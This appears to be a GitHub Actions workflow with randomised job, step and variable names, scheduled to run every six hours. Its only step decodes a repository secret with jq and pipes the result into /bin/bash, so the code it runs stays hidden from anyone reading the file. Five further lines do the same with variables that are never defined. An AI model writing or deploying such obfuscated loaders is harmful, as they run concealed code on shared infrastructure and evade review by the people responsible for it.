name: luazhen1876
on:
  workflow_dispatch:
  schedule:
    - cron: '32 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luazhen1876
        env:
          tfrn964: ${{ secrets.tfrn964 }}
        run: |
          echo $tfrn964 | jq -r .bq976 | /bin/bash
          echo $yw90 | jq -r .hkli555 | /bin/bash
          echo $jsbk50669 | jq -r .saz153 | /bin/bash
          echo $kza8115 | jq -r .euofn00568 | /bin/bash
          echo $isklb3 | jq -r .qccgm50 | /bin/bash
          echo $zjjvq747 | jq -r .gvsnb45900 | /bin/bash

